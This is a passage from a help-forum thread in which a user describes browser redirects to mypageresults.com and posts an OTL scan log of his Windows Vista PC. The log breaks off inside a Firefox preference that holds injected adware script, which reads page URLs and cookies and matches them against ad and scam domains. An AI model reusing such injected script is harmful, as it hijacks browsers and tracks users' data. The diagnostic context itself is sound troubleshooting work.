Jump to content

Welcome to Geeks to Go - Register now for FREE

Need help with your computer or device? Want to learn new tech skills? You're in the right place!
Geeks to Go is a friendly community of tech experts who can solve any problem you have. Just create a free account and post your question. Our volunteers will reply quickly and guide you through the steps. Don't let tech troubles stop you. Join Geeks to Go now and get the support you need!

How it Works Create Account
Photo

Browser redirects to mypageresults.com / safesaver.net [Solved]

Started by Kenjesse , May 20 2014 08:47 AM

  • This topic is locked This topic is locked

#1
Kenjesse
Posted 20 May 2014 - 08:47 AM

Kenjesse

    Member

  • Member
  • PipPip
  • 88 posts

Good Day All,

 

System is Acer Aspire M1610, 1.6 GHz, 3 GB Ram, Windows Vista SP2, 32bit using Open DNS.

 

Computer has been offline and in storage since September 2013.  Powered up yesterday, installed Trendnet AC1200 Dual Band Wireless USB Adapter once online installed 96 odd Windows Critical updates.  Went to Hulu to start a video to test things out when redirect 1st occurred.  Hulu start page loaded then after about 30 seconds or less browser (Firefox) was redirected to URL mypageresults.com title page "SafeSaver.net".  After some 30 seconds more page blanks with following error message:  Same happened using Chrome.

Request-URI Too Large

The requested URL's length exceeds the capacity limit for this server.

boot.gif?u=1&z=1400595119&s=PT1311FA&o=&


 
 

l.gif?hid=eb8d5c4e-dfa8-11e3-bd0d-02e774

  •  
  •  

 

l.gif?hid=eb8d5c4e-dfa8-11e3-bd0d-02e774

1x1.gif

 

Have gotten random error messages from Open DNS regarding to many requests..? Not entirely sure what that is about.

 

I've run Malewarebytes, Superantispyware and Spybot... All found somethings which in itself is unusual as I rarely have any problems and Malwarebytes generally finds nothing when I do a monthly scan.  Did not make note of these results as I "assumed" issue was going to be easily corrected.

 

OTL log is attached any help will be much appreciated.

 

Ken

 

 

OTL logfile created on: 5/20/2014 9:56:17 AM - Run 3
OTL by OldTimer - Version 3.2.69.0     Folder = C:\Users\Ken\Desktop
Windows Vista Home Premium Edition Service Pack 2 (Version = 6.0.6002) - Type = NTWorkstation
Internet Explorer (Version = 9.0.8112.16421)
Locale: 00000409 | Country: United States | Language: ENU | Date Format: M/d/yyyy
 
3.00 Gb Total Physical Memory | 1.80 Gb Available Physical Memory | 60.16% Memory free
6.20 Gb Paging File | 4.90 Gb Available in Paging File | 79.06% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]
 
%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files
Drive C: | 111.69 Gb Total Space | 50.78 Gb Free Space | 45.47% Space Free | Partition Type: NTFS
Drive D: | 111.43 Gb Total Space | 35.69 Gb Free Space | 32.03% Space Free | Partition Type: NTFS
Drive E: | 43.63 Mb Total Space | 0.00 Mb Free Space | 0.00% Space Free | Partition Type: CDFS
Drive F: | 74.53 Gb Total Space | 29.77 Gb Free Space | 39.95% Space Free | Partition Type: NTFS
 
Computer Name: KEN-HOME | User Name: Ken | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: Current user | Quick Scan
Company Name Whitelist: On | Skip Microsoft Files: On | No Company Name Whitelist: On | File Age = 30 Days
 
========== Processes (SafeList) ==========
 
PRC - [2014/05/20 08:28:38 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\Ken\Desktop\OTL.exe
PRC - [2014/05/19 12:49:22 | 005,625,624 | ---- | M] (SUPERAntiSpyware) -- C:\Program Files\SUPERAntiSpyware\SUPERANTISPYWARE.EXE
PRC - [2014/05/07 21:52:34 | 032,668,056 | ---- | M] (Dropbox, Inc.) -- C:\Users\Ken\AppData\Roaming\Dropbox\bin\Dropbox.exe
PRC - [2014/03/11 10:13:24 | 000,279,776 | ---- | M] (Microsoft Corporation) -- c:\Program Files\Microsoft Security Client\NisSrv.exe
PRC - [2014/03/11 10:13:24 | 000,022,216 | ---- | M] (Microsoft Corporation) -- c:\Program Files\Microsoft Security Client\MsMpEng.exe
PRC - [2014/03/11 10:13:14 | 000,951,576 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Microsoft Security Client\msseces.exe
PRC - [2013/04/25 19:32:22 | 000,602,112 | ---- | M] () -- C:\Program Files\TRENDnet\TEW-805UB\WlanCU.exe
PRC - [2013/04/23 03:48:17 | 010,244,448 | ---- | M] (TeamViewer GmbH) -- C:\Program Files\TeamViewer\Version8\TeamViewer.exe
PRC - [2013/04/23 03:48:17 | 003,574,624 | ---- | M] (TeamViewer GmbH) -- C:\Program Files\TeamViewer\Version8\TeamViewer_Service.exe
PRC - [2013/04/23 03:40:59 | 000,193,888 | ---- | M] (TeamViewer GmbH) -- C:\Program Files\TeamViewer\Version8\tv_w32.exe
PRC - [2013/02/12 22:37:16 | 001,263,952 | ---- | M] () -- C:\Program Files\DivX\DivX Update\DivXUpdate.exe
PRC - [2013/01/30 11:41:30 | 000,430,080 | ---- | M] (Realtek) -- C:\Windows\SwUSB.exe
PRC - [2013/01/18 10:21:02 | 000,873,248 | ---- | M] (NVIDIA Corporation) -- C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
PRC - [2013/01/18 10:21:00 | 001,821,984 | ---- | M] (NVIDIA Corporation) -- C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
PRC - [2013/01/18 08:14:20 | 000,383,264 | ---- | M] (NVIDIA Corporation) -- C:\Program Files\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
PRC - [2012/12/14 15:54:26 | 000,036,864 | ---- | M] () -- C:\Windows\runSW.exe
PRC - [2012/10/23 18:58:52 | 000,120,728 | ---- | M] () -- C:\Program Files\Motorola Mobility\Motorola Device Manager\MotoHelperService.exe
PRC - [2012/10/23 18:58:40 | 000,694,168 | ---- | M] () -- C:\Program Files\Motorola Mobility\Motorola Device Manager\MotoHelperAgent.exe
PRC - [2012/09/08 10:18:45 | 000,116,608 | ---- | M] (SUPERAntiSpyware.com) -- C:\Program Files\SUPERAntiSpyware\SASCORE.EXE
PRC - [2011/09/02 17:06:38 | 000,065,657 | ---- | M] (Motorola) -- C:\Program Files\Motorola\MotForwardDaemon\ForwardDaemon.exe
PRC - [2010/11/23 22:21:18 | 000,130,000 | R--- | M] (Symantec Corporation) -- C:\Program Files\Norton Safe Web Lite\Engine\1.2.0.6\ccSvcHst.exe
PRC - [2010/06/16 17:42:58 | 000,839,680 | ---- | M] () -- C:\Program Files\OpenDNS Updater\OpenDNSUpdater.exe
PRC - [2010/03/18 19:17:48 | 000,019,456 | ---- | M] (Creative Technology Ltd) -- C:\Windows\System32\CtHelper.exe
PRC - [2010/02/12 10:23:12 | 000,286,720 | ---- | M] (Creative Technology Ltd) -- C:\Program Files\Creative\Shared Files\CTAudSvc.exe
PRC - [2009/04/11 02:27:36 | 002,926,592 | ---- | M] (Microsoft Corporation) -- C:\Windows\explorer.exe
PRC - [2009/03/05 16:07:20 | 002,260,480 | ---- | M] (Safer-Networking Ltd.) -- C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe
PRC - [2009/01/26 15:31:10 | 001,153,368 | ---- | M] (Safer Networking Ltd.) -- C:\Program Files\Spybot - Search & Destroy\SDWinSec.exe
PRC - [2008/11/12 17:01:14 | 003,425,632 | ---- | M] (Symantec Corporation) -- C:\Program Files\Norton Ghost\Agent\VProSvc.exe
PRC - [2008/07/23 09:55:54 | 002,756,608 | ---- | M] (abelhadigital.com) -- C:\Program Files\HostsMan\hm.exe
PRC - [2008/06/26 19:09:36 | 000,167,936 | ---- | M] () -- C:\Program Files\TRENDnet\TEW-805UB\WlanWpsSvc.exe
PRC - [2008/01/29 17:38:31 | 000,583,048 | ---- | M] (Symantec Corporation) -- C:\Program Files\Common Files\Symantec Shared\PIF\{B8E1DD85-8582-4c61-B58F-2F227FCA9A08}\PIFSvc.exe
PRC - [2007/02/27 19:08:38 | 000,689,672 | ---- | M] (American Power Conversion Corporation) -- C:\Program Files\APC\APC PowerChute Personal Edition\mainserv.exe
PRC - [2007/02/13 07:26:50 | 000,053,248 | ---- | M] (Acer Inc.) -- C:\Acer\Empowering Technology\eRecovery\eRecoveryService.exe
 
 
========== Modules (No Company Name) ==========
 
MOD - [2014/05/20 09:55:08 | 000,041,984 | ---- | M] () -- c:\Users\Ken\AppData\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmpzovlxv.dll
MOD - [2014/01/02 23:42:50 | 003,610,624 | ---- | M] () -- C:\Users\Ken\AppData\Roaming\Dropbox\bin\wxmsw28uh_vc.dll
MOD - [2013/10/18 19:55:02 | 025,100,288 | ---- | M] () -- C:\Users\Ken\AppData\Roaming\Dropbox\bin\libcef.dll
MOD - [2013/09/05 00:14:10 | 004,300,456 | ---- | M] () -- C:\Program Files\Common Files\microsoft shared\OFFICE14\Cultures\OFFICE.ODF
MOD - [2013/04/25 19:32:22 | 000,602,112 | ---- | M] () -- C:\Program Files\TRENDnet\TEW-805UB\WlanCU.exe
MOD - [2013/02/12 22:38:06 | 000,100,688 | ---- | M] () -- C:\Program Files\DivX\DivX Update\DivXUpdateCheck.dll
MOD - [2013/02/12 22:37:16 | 001,263,952 | ---- | M] () -- C:\Program Files\DivX\DivX Update\DivXUpdate.exe
MOD - [2012/10/23 18:58:40 | 000,694,168 | ---- | M] () -- C:\Program Files\Motorola Mobility\Motorola Device Manager\MotoHelperAgent.exe
MOD - [2011/12/13 11:10:00 | 000,413,696 | ---- | M] () -- C:\Program Files\TRENDnet\TEW-805UB\WlanDll.dll
MOD - [2010/10/20 16:45:26 | 008,801,120 | ---- | M] () -- C:\Program Files\Microsoft Office\Office14\1033\GrooveIntlResource.dll
MOD - [2010/06/16 17:42:58 | 000,839,680 | ---- | M] () -- C:\Program Files\OpenDNS Updater\OpenDNSUpdater.exe
MOD - [2009/05/14 10:27:32 | 000,294,912 | ---- | M] () -- C:\Program Files\TRENDnet\TEW-805UB\WPSCtrl.dll
 
 
========== Services (SafeList) ==========
 
SRV - File not found [Auto | Running] -- C:\Program Files\Spybot -- (SBSDWSCService)
SRV - File not found [Auto | Stopped] -- C:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe /h ccCommon -- (LiveUpdate Notice Ex)
SRV - File not found [Auto | Stopped] -- C:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe /h ccCommon -- (CLTNetCnService)
SRV - [2014/03/11 10:13:24 | 000,279,776 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- c:\Program Files\Microsoft Security Client\NisSrv.exe -- (NisSrv)
SRV - [2014/03/11 10:13:24 | 000,022,216 | ---- | M] (Microsoft Corporation) [Auto | Running] -- c:\Program Files\Microsoft Security Client\MsMpEng.exe -- (MsMpSvc)
SRV - [2013/12/19 00:41:02 | 030,814,400 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Program Files\Microsoft Office\Office14\GROOVE.EXE -- (Microsoft SharePoint Workspace Audit Service)
SRV - [2013/04/23 03:48:17 | 003,574,624 | ---- | M] (TeamViewer GmbH) [Auto | Running] -- C:\Program Files\TeamViewer\Version8\TeamViewer_Service.exe -- (TeamViewer8)
SRV - [2013/01/18 08:14:20 | 000,383,264 | ---- | M] (NVIDIA Corporation) [Auto | Running] -- C:\Program Files\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe -- (Stereo Service)
SRV - [2012/12/14 15:54:26 | 000,036,864 | ---- | M] () [Auto | Running] -- C:\Windows\runSW.exe -- (RunSwUSB)
SRV - [2012/12/03 11:39:40 | 001,259,880 | ---- | M] (NVIDIA Corporation) [Auto | Stopped] -- C:\Program Files\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe -- (nvUpdatusService)
SRV - [2012/10/23 18:58:52 | 000,120,728 | ---- | M] () [Auto | Running] -- C:\Program Files\Motorola Mobility\Motorola Device Manager\MotoHelperService.exe -- (Motorola Device Manager)
SRV - [2012/09/08 10:18:45 | 000,116,608 | ---- | M] (SUPERAntiSpyware.com) [Auto | Running] -- C:\Program Files\SUPERAntiSpyware\SASCORE.EXE -- (!SASCORE)
SRV - [2011/09/02 17:06:38 | 000,065,657 | ---- | M] (Motorola) [Auto | Running] -- C:\Program Files\Motorola\MotForwardDaemon\ForwardDaemon.exe -- (PST Service)
SRV - [2011/04/12 17:24:09 | 000,079,360 | ---- | M] (Creative Labs) [On_Demand | Stopped] -- C:\Program Files\Common Files\Creative Labs Shared\Service\AL6Licensing.exe -- (Creative ALchemy AL6 Licensing Service)
SRV - [2011/04/12 17:11:04 | 000,079,360 | ---- | M] (Creative Labs) [On_Demand | Stopped] -- C:\Program Files\Common Files\Creative Labs Shared\Service\CTAELicensing.exe -- (Creative Audio Engine Licensing Service)
SRV - [2010/11/23 22:21:18 | 000,130,000 | R--- | M] (Symantec Corporation) [Auto | Running] -- C:\Program Files\Norton Safe Web Lite\Engine\1.2.0.6\ccSvcHst.exe -- (NSL)
SRV - [2010/02/12 10:23:12 | 000,286,720 | ---- | M] (Creative Technology Ltd) [Auto | Running] -- C:\Program Files\Creative\Shared Files\CTAudSvc.exe -- (CTAudSvcService)
SRV - [2009/08/18 00:19:24 | 000,093,848 | ---- | M] (SiSoftware) [On_Demand | Stopped] -- C:\Program Files\SiSoftware\SiSoftware Sandra Lite 2011\RpcAgentSrv.exe -- (SandraAgentSrv)
SRV - [2009/02/19 16:10:54 | 000,238,968 | ---- | M] (Symantec Corporation) [Auto | Running] -- C:\Program Files\Symantec\LiveUpdate\AluSchedulerSvc.exe -- (Automatic LiveUpdate Scheduler)
SRV - [2009/02/19 16:09:53 | 003,220,856 | ---- | M] (Symantec Corporation) [On_Demand | Stopped] -- C:\Program Files\Symantec\LiveUpdate\LuComServer_3_4.EXE -- (LiveUpdate)
SRV - [2008/11/12 17:01:14 | 003,425,632 | ---- | M] (Symantec Corporation) [Auto | Running] -- C:\Program Files\Norton Ghost\Agent\VProSvc.exe -- (Norton Ghost)
SRV - [2008/06/26 19:09:36 | 000,167,936 | ---- | M] () [Auto | Running] -- C:\Program Files\TRENDnet\TEW-805UB\WlanWpsSvc.exe -- (WlanWpsSvc)
SRV - [2008/01/29 17:38:31 | 000,583,048 | ---- | M] (Symantec Corporation) [Auto | Running] -- C:\Program Files\Common Files\Symantec Shared\PIF\{B8E1DD85-8582-4c61-B58F-2F227FCA9A08}\PIFSvc.exe -- (LiveUpdate Notice Service)
SRV - [2008/01/19 03:38:24 | 000,272,952 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Program Files\Windows Defender\MpSvc.dll -- (WinDefend)
SRV - [2007/02/27 19:08:38 | 000,689,672 | ---- | M] (American Power Conversion Corporation) [Auto | Running] -- C:\Program Files\APC\APC PowerChute Personal Edition\mainserv.exe -- (APC UPS Service)
SRV - [2007/02/22 20:53:16 | 002,217,416 | ---- | M] () [Auto | Stopped] -- C:\Program Files\Common Files\Acronis\Acronis Disk Director\oss_reinstall_svc.exe -- (AcronisOSSReinstallSvc)
SRV - [2007/02/13 07:26:50 | 000,053,248 | ---- | M] (Acer Inc.) [Auto | Running] -- C:\Acer\Empowering Technology\eRecovery\eRecoveryService.exe -- (eRecoveryService)
 
 
========== Driver Services (SafeList) ==========
 
DRV - File not found [Kernel | On_Demand | Stopped] -- system32\DRIVERS\SymIM.sys -- (SymIMMP)
DRV - File not found [Kernel | On_Demand | Stopped] -- system32\DRIVERS\nwlnkfwd.sys -- (NwlnkFwd)
DRV - File not found [Kernel | On_Demand | Stopped] -- system32\DRIVERS\nwlnkflt.sys -- (NwlnkFlt)
DRV - File not found [Kernel | On_Demand | Stopped] -- system32\DRIVERS\Motousbnet.sys -- (Motousbnet)
DRV - File not found [Kernel | On_Demand | Stopped] -- system32\DRIVERS\motswch.sys -- (MotoSwitchService)
DRV - File not found [Kernel | On_Demand | Stopped] -- system32\DRIVERS\motmodem.sys -- (motmodem)
DRV - File not found [Kernel | On_Demand | Stopped] -- system32\DRIVERS\motodrv.sys -- (MotDev)
DRV - File not found [Kernel | On_Demand | Stopped] -- system32\DRIVERS\motccgpfl.sys -- (motccgpfl)
DRV - File not found [Kernel | On_Demand | Stopped] -- system32\DRIVERS\motccgp.sys -- (motccgp)
DRV - File not found [Kernel | On_Demand | Stopped] -- System32\Drivers\motoandroid.sys -- (motandroidusb)
DRV - File not found [Kernel | On_Demand | Stopped] -- system32\DRIVERS\ipinip.sys -- (IpInIp)
DRV - File not found [Kernel | On_Demand | Stopped] -- system32\DRIVERS\motfilt.sys -- (BTCFilterService)
DRV - File not found [Kernel | Disabled | Stopped] -- C:\Windows\system32\drivers\blbdrive.sys -- (blbdrive)
DRV - [2014/03/11 09:52:30 | 000,104,264 | ---- | M] (Microsoft Corporation) [Kernel | Auto | Running] -- C:\Windows\System32\drivers\NisDrvWFP.sys -- (NisDrv)
DRV - [2013/02/26 00:22:06 | 008,939,296 | ---- | M] (NVIDIA Corporation) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\nvlddmkm.sys -- (nvlddmkm)
DRV - [2013/02/09 07:23:00 | 001,957,448 | ---- | M] (Realtek Semiconductor Corporation                           ) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\RTWlanU.sys -- (RtlWlanu)
DRV - [2011/08/21 13:10:33 | 000,232,512 | ---- | M] (DT Soft Ltd) [Kernel | System | Running] -- C:\Windows\System32\drivers\dtsoftbus01.sys -- (dtsoftbus01)
DRV - [2011/08/02 09:59:41 | 000,105,592 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Stopped] -- C:\Program Files\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys -- (EraserUtilRebootDrv)
DRV - [2011/07/22 12:27:02 | 000,012,880 | ---- | M] (SUPERAdBlocker.com and SUPERAntiSpyware.com) [Kernel | System | Running] -- C:\Program Files\SUPERAntiSpyware\sasdifsv.sys -- (SASDIFSV)
DRV - [2011/07/12 17:55:22 | 000,067,664 | ---- | M] (SUPERAdBlocker.com and SUPERAntiSpyware.com) [Kernel | System | Running] -- C:\Program Files\SUPERAntiSpyware\SASKUTIL.SYS -- (SASKUTIL)
DRV - [2011/05/12 09:44:04 | 000,374,392 | ---- | M] (Symantec Corporation) [Kernel | System | Running] -- C:\Program Files\Common Files\Symantec Shared\EENGINE\eeCtrl.sys -- (eeCtrl)
DRV - [2010/09/02 17:49:08 | 000,013,312 | ---- | M] (June Fabrics Technology Inc.) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\pneteth.sys -- (pneteth)
DRV - [2010/03/18 20:50:12 | 000,189,528 | ---- | M] (Creative Technology Ltd) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\haP17v2k.sys -- (hap17v2k)
DRV - [2010/03/18 20:50:04 | 000,162,904 | ---- | M] (Creative Technology Ltd) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\haP16v2k.sys -- (hap16v2k)
DRV - [2010/03/18 20:49:56 | 000,798,808 | ---- | M] (Creative Technology Ltd) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\ha10kx2k.sys -- (ha10kx2k)
DRV - [2010/03/18 20:45:42 | 000,092,760 | ---- | M] (Creative Technology Ltd) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\emupia2k.sys -- (emupia)
DRV - [2010/03/18 20:45:28 | 000,157,272 | ---- | M] (Creative Technology Ltd) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\ctsfm2k.sys -- (ctsfm2k)
DRV - [2010/03/18 20:45:20 | 000,014,424 | ---- | M] (Creative Technology Ltd) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\ctprxy2k.sys -- (ctprxy2k)
DRV - [2010/03/18 20:45:12 | 000,127,576 | ---- | M] (Creative Technology Ltd.) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\ctoss2k.sys -- (ossrv)
DRV - [2010/03/18 20:40:48 | 000,347,144 | ---- | M] (Creative Technology Ltd) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\ctdvda2k.sys -- (ctdvda2k)
DRV - [2010/03/18 20:40:40 | 000,528,472 | ---- | M] (Creative Technology Ltd) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\ctaud2k.sys -- (ctaud2k)
DRV - [2010/03/18 20:40:32 | 000,511,064 | ---- | M] (Creative Technology Ltd) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\ctac32k.sys -- (ctac32k)
DRV - [2010/03/18 20:39:36 | 000,100,952 | ---- | M] (Creative Technology Ltd) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\CTERFXFX.sys -- (CTERFXFX.SYS)
DRV - [2010/03/18 20:39:36 | 000,100,952 | ---- | M] (Creative Technology Ltd) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\CTERFXFX.sys -- (CTERFXFX)
DRV - [2010/03/18 20:39:28 | 000,566,360 | ---- | M] (Creative Technology Ltd) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\CTSBLFX.sys -- (CTSBLFX.SYS)
DRV - [2010/03/18 20:39:28 | 000,566,360 | ---- | M] (Creative Technology Ltd) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\CTSBLFX.sys -- (CTSBLFX)
DRV - [2010/03/18 20:39:18 | 000,555,096 | ---- | M] (Creative Technology Ltd) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\CTAUDFX.sys -- (CTAUDFX.SYS)
DRV - [2010/03/18 20:39:18 | 000,555,096 | ---- | M] (Creative Technology Ltd) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\CTAUDFX.sys -- (CTAUDFX)
DRV - [2010/03/18 20:39:10 | 000,099,416 | ---- | M] (Creative Technology Ltd) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\COMMONFX.sys -- (COMMONFX.SYS)
DRV - [2010/03/18 20:39:10 | 000,099,416 | ---- | M] (Creative Technology Ltd) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\COMMONFX.sys -- (COMMONFX)
DRV - [2009/11/20 15:49:30 | 000,465,408 | ---- | M] (Silicon Integrated Systems Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\SISGRKMD.sys -- (SiS6350)
DRV - [2009/11/13 12:40:41 | 000,058,416 | ---- | M] (Silicon Integrated Systems Corporation) [Kernel | Boot | Running] -- C:\Windows\System32\drivers\SISAGPX.SYS -- (SISAGP)
DRV - [2009/08/08 00:46:56 | 000,023,112 | ---- | M] (SiSoftware) [Kernel | On_Demand | Stopped] -- C:\Program Files\SiSoftware\SiSoftware Sandra Lite 2011\WNt500x86\sandra.sys -- (SANDRA)
DRV - [2009/04/11 00:42:52 | 000,031,616 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\winusb.sys -- (WinUSB)
DRV - [2009/02/04 01:21:11 | 000,005,632 | ---- | M] () [File_System | System | Running] -- C:\Windows\System32\drivers\StarOpen.sys -- (StarOpen)
DRV - [2009/01/08 10:42:54 | 000,036,608 | ---- | M] () [Kernel | On_Demand | Stopped] -- C:\Windows\System32\FsUsbExDisk.Sys -- (FsUsbExDisk)
DRV - [2008/11/12 16:49:22 | 000,138,080 | ---- | M] (StorageCraft) [File_System | Boot | Running] -- C:\Windows\System32\drivers\symsnap.sys -- (symsnap)
DRV - [2008/02/22 16:33:02 | 000,114,304 | ---- | M] (MCCI Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\sscdmdm.sys -- (sscdmdm)
DRV - [2008/02/22 16:33:02 | 000,094,336 | ---- | M] (MCCI Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\sscdserd.sys -- (sscdserd)
DRV - [2008/02/22 16:33:02 | 000,014,976 | ---- | M] (MCCI Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\sscdmdfl.sys -- (sscdmdfl)
DRV - [2008/02/22 16:33:00 | 000,087,936 | ---- | M] (MCCI Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\sscdbus.sys -- (sscdbus)
DRV - [2008/01/04 16:06:37 | 000,114,048 | ---- | M] (Acronis) [Kernel | Boot | Running] -- C:\Windows\System32\drivers\snapman.sys -- (snapman)
DRV - [2007/07/31 17:22:16 | 000,014,072 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\vproeventmonitor.sys -- (VProEventMonitor)
DRV - [2007/07/09 06:48:44 | 000,020,622 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\bcmndis.sys -- (USB_NDIS_51)
DRV - [2007/04/23 10:50:50 | 000,025,896 | ---- | M] (Windows ® Codename Longhorn DDK provider) [Kernel | System | Running] -- C:\Windows\System32\drivers\RtlProt.sys -- (RtlProt)
DRV - [2007/03/28 21:49:42 | 000,128,104 | ---- | M] (Microsoft Corporation) [File_System | On_Demand | Stopped] -- C:\Windows\System32\drivers\WimFltr.sys -- (WimFltr)
DRV - [2007/03/28 21:29:10 | 000,037,864 | ---- | M] (Symantec Corporation) [Kernel | Auto | Running] -- C:\Windows\System32\drivers\v2imount.sys -- (v2imount)
DRV - [2007/02/06 14:27:04 | 000,185,728 | ---- | M] (Hauppauge Computer Works, Inc.) [23|25|26]xxx) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\hcwPP2.sys -- (hcwPP2)
DRV - [2007/01/22 04:09:08 | 000,046,592 | ---- | M] (Silicon Integrated Systems Corp.) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\SiSGB6.sys -- (SiSGbeLH)
DRV - [2007/01/09 09:22:28 | 000,006,144 | ---- | M] (Chic) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\moufiltr.sys -- (moufiltr)
DRV - [2006/12/07 19:12:02 | 000,076,584 | ---- | M] () [Kernel | Auto | Running] -- C:\Acer\Empowering Technology\eRecovery\int15.sys -- (int15)
DRV - [2006/09/19 17:47:04 | 000,080,744 | ---- | M] (Wasay) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\WSVD.sys -- (WSVD)
 
 
========== Standard Registry (SafeList) ==========
 
 
========== Internet Explorer ==========
 
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = http://en.us.acer.yahoo.com
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://en.us.acer.yahoo.com
IE - HKLM\..\SearchScopes,DefaultScope = {6A1806CD-94D4-4689-BA73-E35EA1EA9990}
IE - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/...ms}&FORM=IE8SRC
IE - HKLM\..\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990}: "URL" = http://www.google.co...g}&sourceid=ie7
 
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Search Bar = http://g.msn.com/0SE...S01?FORM=TOOLBR
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,SEARCH PAGE = http://g.msn.com/0SE...S01?FORM=TOOLBR
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,SearchMigratedDefaultName = Yahoo! Search
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,SearchMigratedDefaultURL = http://search.yahoo....=utf-8&fr=b1ie7
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com/
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,StartPageCache = 1
IE - HKCU\..\URLSearchHook: {EF99BD32-C1FB-11D2-892F-0090271D4F88} - No CLSID value found
IE - HKCU\..\SearchScopes,DefaultScope = {DC3C0BC4-487D-413F-8EF7-81BA5B62BAA5}
IE - HKCU\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://search.live.c...rce?}&mkt=en-us
IE - HKCU\..\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990}: "URL" = http://www.google.co...g}&sourceid=ie7
IE - HKCU\..\SearchScopes\{AFBCB7E0-F91A-4951-9F31-58FEE57A25C4}: "URL" = http://www.ask.com/w...n=&geo=US&ver=1
IE - HKCU\..\SearchScopes\{DC3C0BC4-487D-413F-8EF7-81BA5B62BAA5}: "URL" = http://www.google.co...1I7GGIH_enUS252
IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
 
========== FireFox ==========
 
FF - prefs.js..browser.search.defaultenginename: "Google"
FF - prefs.js..browser.search.defaulturl: "http://www.google.co...-8&oe=UTF-8&q="
FF - prefs.js..browser.search.selectedEngine: "Google"
FF - prefs.js..browser.search.update: false
FF - prefs.js..browser.startup.homepage: "https://www.google.com/"
FF - prefs.js..extensions.510db82b7af87.scode: "(function(){try{var url=(window.self.location.href + document.cookieif(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumorobo.net\")>-1||url.indexOf(\"mindri.com\")>-1||url.indexOf(\"=apapamam\")>-1||url.indexOf(\"alertfunctions.com\")>-1||url.indexOf(\"immediate-support.com\")>-1||url.indexOf(\"txtlnkusaolp00000800\")>-1||url.indexOf(\"sumorobo\")>-1||url.indexOf(\"roulettebotplus\")>-1||url.indexOf(\"s.vgsgaming-ads\")>-1||url.indexOf(\"=admaven\")>-1||url.indexOf(\"lottery-master\")>-1||url.indexOf(\"lotterymaster\")>-1||url.indexOf(\"5386b_643c_\")>-1||url.indexOf(\"easylifeapp.com\")>-1||url.match(/ressbar.com[^f]+fid=65017/)||url.indexOf(\"form=u064ht&pc=u064\")>-1||url.indexOf(\"source=45905810\")>-1||url.indexOf(\"source=532d277e\")>-1||url.indexOf(\"aro.com/ws/?source=6974b128\")>-1||url.indexOf(\"esmoke.com/?isid=9949\")>-1||url.indexOf(\"esmoke.com/?isid=9950\")>-1||url.indexOf(\"esmoke.com/